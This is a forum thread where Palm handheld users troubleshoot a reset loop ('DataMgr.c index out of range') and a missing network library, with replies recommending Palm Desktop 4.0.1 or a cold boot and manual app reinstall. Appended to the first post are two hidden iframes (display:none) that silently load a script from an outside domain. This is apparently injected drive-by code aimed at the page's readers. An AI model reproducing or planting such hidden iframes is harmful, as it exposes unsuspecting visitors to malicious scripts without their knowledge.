+ Reply to Thread

Angry Device totally froze!

I had some problems with mine:
    I noticed that after deleting some apps, the icons simply disappeared (example was the FedEx app for tracking shipments). After reseting the device using the provided "paper clip" portion of the stylus, they came right back. I must have done this numerous times but last night something went wrong -- I kept getting "Error - DataMgr.c index out of range - [RESET]"

I kept reseting the device using the paper clip method about a dozen times or so and I kept getting the same error and the unit stayed totally locked up. It was only when I kept the upper scroll button down while using the paper clip that the device finally came back and initialized properly (or so I thought).

After I finally got in, I tried to go into the Network portion of
    Prefs - it is here that the unit kept telling me something like "Network library not found - reset the device". The only
    problem is that when I reset the device, I got back to the "Error -
    DataMgr.c index out of range - [RESET]" portion once again.

I had to start from the beginning and ultimately reset the device to factory settings (from the Security app). I even tried to restore
    all the handheld databases from the desktop only to get back to the initial stage -- "Error - DataMgr.c index out of range - [RESET]".

Does anyone know of a way to reinstall the initial network library
    without going through resetting the device to factory settings?

Unfortunately I had to reinstall every app manually after doing the hard reset, also keeping in mind that I had to delete the username from the desktop so as not to restore the databases back to the device when doing a HotSync - it took over 1 hour to get everything back (I always make a backup of the username directory to have a copy of the address, todo, memo, and datebook folders). There has to be a better way - especially if you're away on a business trip. Any feedback would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

are you using palm desktop 4.0.1?

No. Does that have some sort of restore feature or something?

Administrator

Arrow

yes. it has an updated hotsync manager. it saves all of your voice/speed dial #'s and your 3rd party apps... ive been using it on my 6035. go to the palm site to get it!

Totally cool man! I'm getting it now. Thanks!

Unhappy Network Library Not Available

After a system error & reset while connected to the Wireless Web, I have encountered an error in my network preferences saying "Network library is not avialable." I have done both hard and soft resets, reinstalled all software, etc.

I have found a posting with similar problems but the solution was to upgrade to Palm Desktop version 4.0.1 I am on a Mac and I'm using Desktop 4.0 This doesn't seem to help.

I can not use any of my wireless services (i.e. e-mail, web clipping, AIM, etc.).

I'd appreciate any help! I love this phone when it works properly, but these things make me want to throw it out the window! ARGH!

Joe

Joe,
    What network connection are you trying to use?

homer

When it originally caused the reset, I was using my Earthlink server, but now I don't have access to any of my saved network preferences.

Administrator

Arrow

sounds liike you need to do a cold boot and dont NOT resync to the palm desktop. instead just manuall install your apps. a PITA, but you will be on the top of everything...